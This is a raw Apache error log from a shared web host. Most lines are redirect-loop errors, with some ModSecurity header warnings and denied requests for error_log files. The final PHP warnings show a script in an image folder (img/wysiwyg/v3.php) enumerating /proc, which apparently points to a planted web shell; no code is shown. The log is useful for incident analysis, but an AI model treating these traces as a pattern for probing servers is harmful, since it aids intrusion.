[Mon May 11 19:32:36.115877 2026] [core:error] [pid 1502013:tid 1502058] [client 66.249.75.100:53739] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:32:41.760643 2026] [security2:error] [pid 1501831:tid 1501833] [client 101.32.128.113:36332] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agISuVNddpkriGUb6ZVZrQAAAQA"]
[Mon May 11 19:32:51.958110 2026] [authz_core:error] [pid 1501831:tid 1501853] [client 47.128.58.222:32308] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/ID3/error_log
[Mon May 11 19:33:04.840326 2026] [:error] [pid 1501831:tid 1501851] [client 74.7.175.184:53976] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 19:33:09.357097 2026] [core:error] [pid 1516058:tid 1516104] [client 4.193.137.131:6550] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:09.357136 2026] [core:error] [pid 1516058:tid 1516104] [client 4.193.137.131:6550] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:09.855344 2026] [core:error] [pid 1501883:tid 1501900] [client 4.193.137.131:6976] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:09.855371 2026] [core:error] [pid 1501883:tid 1501900] [client 4.193.137.131:6976] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:10.330885 2026] [core:error] [pid 1511173:tid 1511197] [client 4.193.137.131:6983] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:10.330911 2026] [core:error] [pid 1511173:tid 1511197] [client 4.193.137.131:6983] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:10.834641 2026] [core:error] [pid 1511173:tid 1511180] [client 4.193.137.131:6532] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:10.834671 2026] [core:error] [pid 1511173:tid 1511180] [client 4.193.137.131:6532] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:11.329801 2026] [core:error] [pid 1502013:tid 1502046] [client 4.193.137.131:7010] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:11.329831 2026] [core:error] [pid 1502013:tid 1502046] [client 4.193.137.131:7010] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:11.807480 2026] [core:error] [pid 1501883:tid 1501906] [client 4.193.137.131:6995] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:11.807507 2026] [core:error] [pid 1501883:tid 1501906] [client 4.193.137.131:6995] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:12.325422 2026] [core:error] [pid 1501883:tid 1501901] [client 4.193.137.131:6538] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:12.325464 2026] [core:error] [pid 1501883:tid 1501901] [client 4.193.137.131:6538] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:12.840732 2026] [core:error] [pid 1501883:tid 1501903] [client 4.193.137.131:7004] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:12.840760 2026] [core:error] [pid 1501883:tid 1501903] [client 4.193.137.131:7004] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:13.336506 2026] [core:error] [pid 1511173:tid 1511178] [client 4.193.137.131:6533] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:13.336539 2026] [core:error] [pid 1511173:tid 1511178] [client 4.193.137.131:6533] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:13.837874 2026] [core:error] [pid 1502013:tid 1502058] [client 4.193.137.131:6558] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:13.837905 2026] [core:error] [pid 1502013:tid 1502058] [client 4.193.137.131:6558] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:14.370255 2026] [core:error] [pid 1516058:tid 1516107] [client 4.193.137.131:7005] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:14.370285 2026] [core:error] [pid 1516058:tid 1516107] [client 4.193.137.131:7005] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:14.876918 2026] [core:error] [pid 1511173:tid 1511198] [client 4.193.137.131:6585] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:14.876946 2026] [core:error] [pid 1511173:tid 1511198] [client 4.193.137.131:6585] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:15.364188 2026] [core:error] [pid 1502013:tid 1502032] [client 4.193.137.131:6986] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:15.364235 2026] [core:error] [pid 1502013:tid 1502032] [client 4.193.137.131:6986] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:15.849318 2026] [core:error] [pid 1501883:tid 1501904] [client 4.193.137.131:6999] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:15.849356 2026] [core:error] [pid 1501883:tid 1501904] [client 4.193.137.131:6999] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:16.344429 2026] [core:error] [pid 1501831:tid 1501848] [client 4.193.137.131:7002] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:16.344460 2026] [core:error] [pid 1501831:tid 1501848] [client 4.193.137.131:7002] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:16.819570 2026] [core:error] [pid 1516058:tid 1516100] [client 4.193.137.131:6985] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:16.819601 2026] [core:error] [pid 1516058:tid 1516100] [client 4.193.137.131:6985] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:17.300763 2026] [core:error] [pid 1511173:tid 1511177] [client 4.193.137.131:7004] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:17.300790 2026] [core:error] [pid 1511173:tid 1511177] [client 4.193.137.131:7004] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:17.803279 2026] [core:error] [pid 1511173:tid 1511192] [client 4.193.137.131:6989] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:17.803310 2026] [core:error] [pid 1511173:tid 1511192] [client 4.193.137.131:6989] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:18.322074 2026] [core:error] [pid 1501831:tid 1501836] [client 4.193.137.131:6550] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:18.322200 2026] [core:error] [pid 1501831:tid 1501836] [client 4.193.137.131:6550] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:18.812880 2026] [core:error] [pid 1516058:tid 1516103] [client 4.193.137.131:7000] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:18.812922 2026] [core:error] [pid 1516058:tid 1516103] [client 4.193.137.131:7000] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:19.331590 2026] [core:error] [pid 1501831:tid 1501843] [client 4.193.137.131:7009] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:19.331728 2026] [core:error] [pid 1501831:tid 1501843] [client 4.193.137.131:7009] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:19.824761 2026] [core:error] [pid 1516058:tid 1516108] [client 4.193.137.131:6998] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:19.824953 2026] [core:error] [pid 1516058:tid 1516108] [client 4.193.137.131:6998] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:20.313522 2026] [core:error] [pid 1501883:tid 1501888] [client 4.193.137.131:6549] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:20.313649 2026] [core:error] [pid 1501883:tid 1501888] [client 4.193.137.131:6549] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:20.800367 2026] [core:error] [pid 1502013:tid 1502030] [client 4.193.137.131:7007] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:20.800398 2026] [core:error] [pid 1502013:tid 1502030] [client 4.193.137.131:7007] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:21.273890 2026] [core:error] [pid 1501883:tid 1501893] [client 4.193.137.131:6565] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:21.273924 2026] [core:error] [pid 1501883:tid 1501893] [client 4.193.137.131:6565] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:21.749962 2026] [core:error] [pid 1501883:tid 1501892] [client 4.193.137.131:6551] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:21.749992 2026] [core:error] [pid 1501883:tid 1501892] [client 4.193.137.131:6551] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:22.225195 2026] [core:error] [pid 1502013:tid 1502033] [client 4.193.137.131:6558] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:22.225232 2026] [core:error] [pid 1502013:tid 1502033] [client 4.193.137.131:6558] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:22.700719 2026] [core:error] [pid 1511173:tid 1511184] [client 4.193.137.131:6557] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:22.700752 2026] [core:error] [pid 1511173:tid 1511184] [client 4.193.137.131:6557] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:23.182630 2026] [core:error] [pid 1502013:tid 1502059] [client 4.193.137.131:6978] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:23.182660 2026] [core:error] [pid 1502013:tid 1502059] [client 4.193.137.131:6978] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:23.691820 2026] [core:error] [pid 1501883:tid 1501890] [client 4.193.137.131:6990] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:23.691854 2026] [core:error] [pid 1501883:tid 1501890] [client 4.193.137.131:6990] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:24.237519 2026] [core:error] [pid 1501831:tid 1501852] [client 4.193.137.131:6550] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:24.237552 2026] [core:error] [pid 1501831:tid 1501852] [client 4.193.137.131:6550] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:24.730950 2026] [core:error] [pid 1501831:tid 1501840] [client 4.193.137.131:6589] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:24.730975 2026] [core:error] [pid 1501831:tid 1501840] [client 4.193.137.131:6589] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:25.209980 2026] [core:error] [pid 1511173:tid 1511189] [client 4.193.137.131:6552] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:25.210019 2026] [core:error] [pid 1511173:tid 1511189] [client 4.193.137.131:6552] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:25.747104 2026] [core:error] [pid 1502013:tid 1502037] [client 4.193.137.131:6535] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:25.747779 2026] [core:error] [pid 1502013:tid 1502037] [client 4.193.137.131:6535] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:26.239279 2026] [core:error] [pid 1516058:tid 1516095] [client 4.193.137.131:6569] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:26.239306 2026] [core:error] [pid 1516058:tid 1516095] [client 4.193.137.131:6569] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:26.714562 2026] [core:error] [pid 1516058:tid 1516106] [client 4.193.137.131:6529] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:26.714597 2026] [core:error] [pid 1516058:tid 1516106] [client 4.193.137.131:6529] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:27.189225 2026] [core:error] [pid 1501831:tid 1501836] [client 4.193.137.131:6541] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:27.189255 2026] [core:error] [pid 1501831:tid 1501836] [client 4.193.137.131:6541] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:27.668935 2026] [core:error] [pid 1511173:tid 1511177] [client 4.193.137.131:6530] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:27.668969 2026] [core:error] [pid 1511173:tid 1511177] [client 4.193.137.131:6530] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:28.157092 2026] [core:error] [pid 1502013:tid 1502035] [client 4.193.137.131:6533] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:28.157129 2026] [core:error] [pid 1502013:tid 1502035] [client 4.193.137.131:6533] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:28.660724 2026] [core:error] [pid 1501883:tid 1501905] [client 4.193.137.131:7005] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:28.660761 2026] [core:error] [pid 1501883:tid 1501905] [client 4.193.137.131:7005] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:29.151177 2026] [core:error] [pid 1516058:tid 1516103] [client 4.193.137.131:6983] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:29.151214 2026] [core:error] [pid 1516058:tid 1516103] [client 4.193.137.131:6983] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:29.667836 2026] [core:error] [pid 1516058:tid 1516108] [client 4.193.137.131:6991] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:29.667874 2026] [core:error] [pid 1516058:tid 1516108] [client 4.193.137.131:6991] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:30.174034 2026] [core:error] [pid 1511173:tid 1511193] [client 4.193.137.131:6570] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:30.174065 2026] [core:error] [pid 1511173:tid 1511193] [client 4.193.137.131:6570] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:30.669176 2026] [core:error] [pid 1516058:tid 1516096] [client 4.193.137.131:6981] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:30.669208 2026] [core:error] [pid 1516058:tid 1516096] [client 4.193.137.131:6981] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:31.151630 2026] [core:error] [pid 1511173:tid 1511186] [client 4.193.137.131:7001] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:31.151767 2026] [core:error] [pid 1511173:tid 1511186] [client 4.193.137.131:7001] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:31.627003 2026] [core:error] [pid 1502013:tid 1502030] [client 4.193.137.131:6997] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:31.627039 2026] [core:error] [pid 1502013:tid 1502030] [client 4.193.137.131:6997] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:33:36.099384 2026] [ssl:error] [pid 1501883:tid 1501890] (EAI 2)Name or service not known: [client 3.249.231.193:53812] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 19:33:36.099616 2026] [ssl:error] [pid 1501883:tid 1501890] AH01941: stapling_renew_response: responder error
[Mon May 11 19:34:47.714626 2026] [security2:error] [pid 1511173:tid 1511185] [client 43.166.244.66:53986] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "tct-telecom.fr"] [uri "/wp-content/uploads/2023/04/cropped-Logo_TCT-PRO_fond-blanc-192x192.webp"] [unique_id "agITN_jVc-A-CSptvm1XIQAAAEk"]
[Mon May 11 19:34:56.719483 2026] [security2:error] [pid 1502013:tid 1502045] [client 49.235.136.28:33598] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "naturedetres.fr"] [uri "/"] [unique_id "agITQJYn-x0CHsbEbP2PdwAAAJI"]
[Mon May 11 19:35:16.076534 2026] [security2:error] [pid 1501831:tid 1501839] [client 101.33.81.73:52064] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agITVFNddpkriGUb6ZValQAAAQY"]
[Mon May 11 19:35:20.627411 2026] [authz_core:error] [pid 1501831:tid 1501846] [client 47.128.58.61:10740] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/ID3/error_log
[Mon May 11 19:35:31.322767 2026] [authz_core:error] [pid 1502013:tid 1502050] [client 47.128.58.38:38778] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/html-api/error_log
PHP Warning:  filesize(): stat failed for /proc/237/task/237/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/237/task/237/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/237/task/237/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/237/task/237/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/237/task/237/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
